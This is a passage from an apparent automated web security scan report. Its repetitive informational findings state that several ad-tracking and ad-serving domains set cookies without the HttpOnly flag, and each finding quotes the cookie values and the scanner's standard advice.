rsi_segs__1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rsB4rOfq5QuYXLnKYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU5yOkHFIHZYDJEHWaOW+4wYaiyyY715ckFoFlDXAQEgoeqnG3CUq1eF28RHMrcV0qtaohUjTO3yPCIMPaYnGbhmVSc5VfYij9OMIYKQd6IEV/U7eaOKVrIVUuoozmIGg2QYHf7CkyKF/JXks5veheEvi341VI6cB5NWitPCMF79O9TY2r/1wMDRcxCr0dOcOdWfBETSZ5j8rCSuegYPLLWDcPlCLSDoScLh4z5LS4irvuWTxzQqieFTIm02czO7dpwSpf2Y03EuikRKLvIQ54HXIZiXFRPHQ+5fNwzySL2dIvUlQvXsMV1c7MlCYCi+fiGdsiNsHNxHVjX8mas8pgfv2ttYG+R5Eg+ThssuvXjIsc1pVES5xcei65xpvTqTJaydwuZ9kxQ5keTeT1tnFtzpwFdZ8U8GECM54dZrQOemERZaGGIdE0y1HTZTwX48tMHCOtiJHmt3yea4FtR/slYBWdCdCAo1Nm6994UlxsgpWDUNgaHw5bycN5/By3TFwX+jrP8dD+oaWZJ8AJL0UK7e2pDV0vceBeayTLoc9lBQ+P3ZqQwLxTRawPc5ca2Q95/KGyQGdIN4xMvc2lY7fC7DMX+HCQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:24:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.102. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBZs66O2VJ8nVhNNNA7LZsKuuAdRuhry5GdSvQAU1GrEi6UrT031s4JkwQXEb8iMDPHlQXvF2uv5OIusuoi2sbvsqxUqk1VHa83DvyOqZvgWqVxmcWIamC8nXWAIxqsezSe9oa5Vy/39rYVS1FgBxQvTCIiMa+1j8IL4+DjF7YsXO0HH0P2m2BTTsqddAWCMGLPLh+9Cs9xqVbfqx7zH1UcAcqLfUKR70nAS6SB+1Mh0bs5npya/B4+7GDnx8HBkvUi+ouzwsZmH0fQIXYZ5ZcsMxeA+iWTJiRwNpXgkDESmSMqOEZF59Ut9jwiQU11yXCG8iFmI2XUdPD0H8ErsVwgA9biYW5Yj3NVVCkvoEaq43d16SUggpvN8g/AFXH15SbwW7X9gjbPGS9RIENjX6rn9tQMgTqBUTiqF16lrWksHSvZqvitgEQSz3RWRhZBIdzIiqo4/JObC7ZHHBzgvGV/OgaatwL0I0OTsTQqkcyonrPn7KuBJ6I1XFRCgHp4dLUVnHL6uJVK1GTCxQfuuXlrQKXUFuef2oQMC8EYT57CseI2qqj9oxzUSU5ywdq4HoeLXnUO8eYXAY53K1pk5HZtpJ+v00a6NY+CsVg7bLaPy/d2DpcEJFWPqMnlti4nmKcrgKdxUBx/kK9iokVycpba8A/2rez9ysp/+AyFOD1FTgfGzaXlR5ruBZt86DBa4C81/AGN8KKoSigo7EovtmqRc3N0JF8EFYFOKigdpyYtQaoowobd8Rroom9yZ2LHSRJxryuWonCs3lsDwHnMMnjM1eXX8T0PrzQogtKydVuWTdGAIs28/W1jJOqA8JukiohsPhNhmelK4zWXHCr+sIOb9MSIe7t8zo2wsA3Oa1L++Xy8vQHbc+gZSvjKaIBdqoq8+4h5Hbk4nV2bX9HHyoUVGZqXawGuQLDyjLdWy4IeDra0J3uKuS9pPwIsigk/Pxfzj5rxyVDvwfLvBEjwcENcKRMTjiJnlQTQ7HIk3OkhZWQLD+ANAbGec6CQkywZ0ZGs0xSOWq8c3M3wd4HVwbqvfguMbjWwqWPEhOIeKf30NqRKhrmUnw/FklhU+qb67/ZUArmuo1UqXBEY+He0Ddh9j19YLh5AUJqa8a7pECW2xwiDzd4kZcs0qizk2lFijcP1fCQ6Azo7mx9hrba4+LZ/pE4vbfPSSvVVdWH07GR24Vw53yUvTfyra9ld5weXosVyVsa+AZYYAnVicha4hTRKyFfJD9dV6uLKI3FIBpJTsYzqHpIIvfpO4WXe0Nvo0HXgWikO2safFF2xECLaSEgk8QYc0uBVmy3lHR3SKCeGRx4S0xKCdHlbbY7cNMryPWK771UVOGSQpjoLyvm3/uFXZvd6QE8fkxEuJ9SzbrrOQxSWC4avatQ17yMlYzj+l9+rVEqQNUYc4lrNZVAaTdUyIyY99yoNuAyx9sqFaQw3tzvE1dzRUXprIhlbOwLtkSTuMNJzIlxtpOEMHmZrsyHxDJldOymIcSEAikUgk3wN9vp6O7gelgk3x581ZUT7Htb1tASL4XJh1P8lc8yvfgx773aOBJvbuFs+vu1XaE85OCKKmkLkgABwiaNW6h2qHai5o8W+h1i8kBw4D/8fpLGhFE5ObkFCwLlo2Nh58cjpMBai3a2SC75wIjc0XlZGXet2KAkdt9w/6KF4AAbPiVaDb8HX5LOQMzfk1mCXsJd2a/D2t0InE4Y/UHMiQHFSctcrNuS9u57VHqfpJtPnAAFm+p+QgzKIngJb+TMyIy9OrgWMDYF5mYTdV+gSxfrVo7MepKYjVxewZSUXpZIPC6wOhpPUBa3iNIeUpY8H8Ti5KJZfpNYNdYa2U5f5n9CeXcEQTjBndgqQNcnmGQn4sn; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:22:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.103. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=BBg+NFJwHob0Fn7sIWwJoaMntKPCC0nBwJpwEg02FYNBdbdBWTwihXg1EwjmGYNBxGeBWTAQvag1EQW4FYNBLppBWTQghXg1EgN5FYNB6ijBWTAmhXg1EAY4FYNBdDmBWTA/yag1EAVZGYNBYimBWTA3Wag1EQY4FYNBFGeBWTAxBag1EU1aGYNBbTeBWTQwBag1EYnXGYNBWGoBWTgQvag1EogmGYNBxmpBWTQRgag1E0soGYNB8mpBWDrnA8ekGmQkBAAoNXcCmZOiGSKtyBw2saYCNSPC73cBu1KaAwzgGSvr5DwxaaI9CQ4kGFtt4Kgq4aYCzamAjSqRRPLUCsEpGFdpFDw09YMFvCBB3hoxVC; domain=advertising.com; expires=Sat, 15-Jun-2013 13:08:17 GMT; path=/
GUID=MTMwODIyOTY5NzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Sat, 15-Jun-2013 13:08:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.104. http://map.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://map.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

adh=1lluut6160b59iw010t602U5VzBCfEH000duhMllYZOUL10000eh3j3r010t602Ux0lBKWOP000dnnNsf4RBHGo0002704kzp010t601OnK3JLpHn0003of3ftm010t601NLfLZBxCP0001cz5ga6010t601M1fYxCfX+0000sx4tm1010t601M0QkBMuNQ0000rt4qk0010t601Ms7JhMtyT0000l53ncx010t601MePkBCfDV00007s5awn010t601MbzDxPdaX00005k4th1010t601Mak3hDIUX00004g5gty010t601MVrdZPDCo000000; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/
clid=2ll77mm01171voofy6a0tk1w1on4k0214n020p0560f; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/
orblb=2ll8nk2072gh20u021a7x60opab0w010opc82k810v010xuvq23a10u010ps6m27y11e0109x0q2gu10u0300zeq00z1q00yg11zw10u0200z2400yjk1y510u0100000; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/
rdrlst=4300pi2lluuxo000000164n020klzlluuxo000000164n020x1blluutb000000184n021918lmuv1k000000034n020e0dlluuxo000000164n020e0klluyhn0000000o4n020d6hll8nk2000000204n020mollluvl10000000w4n020e0rlluv11000000124n02007jlluutb02i2z0184n020w9wlluutb000000184n021196llkg950000001k4n021195llnepl09y6p01h4n020bnelm6ifs0000000a4n021194lljpq30ogm301l4n020bnhlm52500000000b4n0205grlmdlbx000000074n0201g3ll8nk20opc80204n020j4wllv8nq0000000k4n021908lmvu19000000024n021193llnesr0000001g4n021192lljn150dpv501m4n020moxlluvec0000000y4n020dt1lluvec0000000y4n0217xdlluutb000000184n02114qlluutb000000184n020e6mll9m030000001v4n020e6llluv7p000000104n020kmmlluw660000000s4n020kk3lluvm30000000u4n02159jlm523d0000000c4n020e5ylluvm30000000u4n020wgclluutb000000184n0212anlluuxo000000164n020wgmllxcud0000000j4n020gjzlluv7p000000104n020df3lluv11000000124n020m0tllv8gv0000000m4n020yc9lluv7p000000104n020wghllv8nq0000000k4n020yzxlluv11000000124n020gjqllv8nq0000000k4n02167alluuyr000000144n020m9illuuyr000000144n020wgrlm522h0000000d4n020m0jllyfqo0000000h4n02100xllo31q0000001e4n020obllluutb000000184n020ycqlluvl10000000w4n02166wlluv7p000000104n021015lluutb000000184n020ycmlluv11000000124n020klalluutb000000184n020na6llux090000000q4n020yzblluutb000000184n020spbll9m030000001v4n020dr8lluutb000000184n020ojulluuxo000000164n02101ellrto10000001d4n0214ozllneum0000001f4n0215ztll9l280000001w4n020pdmlluuxo000000164n02101mllrttq0000001c4n020yyslluuyr000000144n020n9qllxcud0000000j4n020m74lluyhn0000000o4n020m7elluvm30000000u4n02101ulluutb000000184n020lb4llux090000000q4n020zp7lluuxo000000164n020yy9lluvec0000000y4n020bq5lmivh8000000064n020860lm2xlp0000000g4n020caglluutb000000184n0208d4lm4som0000000f4n0200c6lluutb000000184n0210tyllkjwu0000001j4n020lb0lluvec0000000y4n0211z0lluuxo000000164n020njjlluyhn0000000o4n020lazlluuyr000000144n020msvll9m030nqw701v4n0210telle7v60j51401o4n0212enlluutb000000184n0210rdllikks0esbi01n4n020m3ullv8gv0000000m4n020wbqlluvm30000000u4n020m44lluw660000000s4n0212llllneum0000001f4n0212lmlluutb000000184n020mj8lluv11000000124n0210kylmivh8000000064n020ovullneum0000001f4n0212qnllkonl0000001i4n020kn9lluv7p000000104n020mjilluuyr000000144n020dvalluvl10000000w4n020g9zlluw660000000s4n02120bllneum0000001f4n0201hvll8nk20opc80204n0216iell9m030000001v4n020ga6llux090000000q4n0207vglluuyr000000144n020fclllv8gv0000000m4n020ph0lluutb000000184n0218h8lm51zz0000000e4n020o0ulluv11000000124n020e15lluvl10000000w4n02; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/
sglst=2230s9eslluut6000000194n020p0560fef6lmq6u304o7h0014k000p00600armllnepl12s4i01d4j000p00600ey7lmq6u304o7h0014k000p006000ixlljn151b80f01m4n020p0560fefjlmq6u304o7h0044n020p04604dsolmq6u304o7h0044n020p04604bzvllikks1da6e01n4n020p0560fexulmq6u304o7h0014k000p00600dlell9l281l9zc01u4n020p0560fejelmq6u304o7h0044n020p04604e0vllnepl17gbz01g4n020p046044rylljn1516jsy01i4j000p00600aojlljn1516jsy01i4j000p006009uklljn151b80f01l4n020p0460490ill9m031m8r301v4n020p0560fbvdlljn151b80f01m4n020p0560f56blljn151b80f01j4k000p00600dz4lmq6u304o7h0044n020p046041jzll8nk21n7740204n020p0560fecwlmq6u304o7h0014k000p00600asqllnepl12s4i01d4j000p0060040ullkg9515qky01g4j000p006003a6lm51zz0qsr700e4n020p0560ebjflljn1516jsy01i4j000p006005l3lluv0y000000134n020p0560fecklmq6u304o7h0014k000p00600bjhllnepl12s4i01d4j000p0060061jllnepl12s4i01d4j000p00600f7xlmq6u304o7h0014k000p00600cwgllnepl12s4i01d4j000p00600ag2lle7v61hmw001o4n020p0560fbnwlle7v61byyx01k4j000p00600a6slljn151b80f01m4n020p0560fet0lmq6u304o7h0014k000p00600ekglmq6u304o7h0014k000p00600ehallnepl12s4i01d4j000p00600edxlmq6u304o7h0014k000p00600eh8lljn1516jsy01i4j000p00600b3zllnepl12s4i01d4j000p006009q5lljn1516jsy01i4j000p00600ehellnepl12s4i01d4j000p006005nkllnepl17gbz01h4n020p0560fbo0lle7v61byyx01f4j000p006009mkllnepl17gbz01g4n020p04604cwallnepl17gbz01h4n020p0560f3wjllnepl12s4i01d4j000p00600ekzlmq6u304o7h0044n020p04604bo8lle7v61gn6e01o4n020p0560fb3jlmivh80cz9y0064n020p05606690lle7v61byyx01k4j000p00600evalmq6u304o7h0014k000p00600ehslmq6u304o7h0044n020p04604719lle7v61byyx01f4j000p006009c9llnepl12s4i01d4j000p00600ebblmq6u304o7h0044n020p04604eyylmq6u304o7h0014k000p00600ef0lmq6u304o7h0014k000p00600eyvlmq6u304o7h0014k000p00600es4lmq6u304o7h0044n020p04604eerlljn1516jsy01i4j000p006009wvlljn151b80f01m4n020p0560febclle7v61byyx01k4j000p00600f1wlmq6u304o7h0044n020p04604eeplmq6u304o7h0044n020p046040tille7v61hmw001o4n020p0560fes0lmq6u304o7h0014k000p006004wcllnepl12s4i01d4j000p0060045mlluuyq000000154n020p0560f5mrlljn1516jsy01i4j000p006005jillnepl17gbz01g4n020p04604e0wlmq6u304o7h0014k000p00600ez9lmq6u304o7h0014k000p00600ee8lmq6u304o7h0044n020p046049gellnepl17gbz01h4n020p0560f; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/
vstcnt=418b010r134me19103210k24ehss103210c24nwh0103210u24n5kn20pm10c203210024fw8l103210t24eu86218e10p203210s24fi35103210624sqj810321002453dh103210324ty31218e10i203210m24u1er218e200202203210324elor218e108203210a24k5jb10pn10c24mwjf103210m24gcxb103210c24rm27218e10820321082496o0218e100203210024f1fr103210c24ep9z118e10q24p056103210024q28r218e108203210g24fn0j103210324b47b103210624uz3i10pm10t24mtp410321002459ao103210324rcz8218e102203210624fu43103210c24wnrf103240220620820924ebm7103210k24qfys103210t24qqy7127p20020224vx8f127p10224ffmk103210024fank103210324dx7s103210m24tfmw1032100249ujm103210t2450o610321002; Domain=media6degrees.com; Expires=Tue, 13-Dec-2011 12:30:42 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.105. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1049999702@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1049999702@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P2018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.106. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1061037567@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1061037567@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|P3018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|Q1018UW|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.107. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1071006765@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1071006765@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.108. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1102913360@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1102913360@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO6018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.109. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1127856009@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1127856009@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.110. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1245329572@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1245329572@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO3018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.111. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1275267067@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1275267067@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO7018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.112. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1286122757@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1286122757@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P1018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.113. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1461570951@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1461570951@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P5018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.114. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1584817229@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1584817229@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.115. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1608535405@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1608535405@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESYO1018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.116. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1646228634@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1646228634@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO1018RL|O2018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.117. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1662691403@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1662691403@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO1018HS|O2018RL|O2018UF|O1018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.118. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1729780354@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1729780354@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.119. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1767572891@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1767572891@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO1018HS|O1018RL|O2018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.120. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1809071643@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1809071643@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO2018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.121. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1837611586@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1837611586@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|P3018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.122. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1851473663@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1851473663@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P3018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.123. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1933034357@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1933034357@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO4018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.124. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1938155974@x15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/1938155974@x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O2018RL|P5018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.125. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1059242575@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1059242575@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.126. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1091147736@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1091147736@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P4018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.127. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1098629905@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1098629905@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

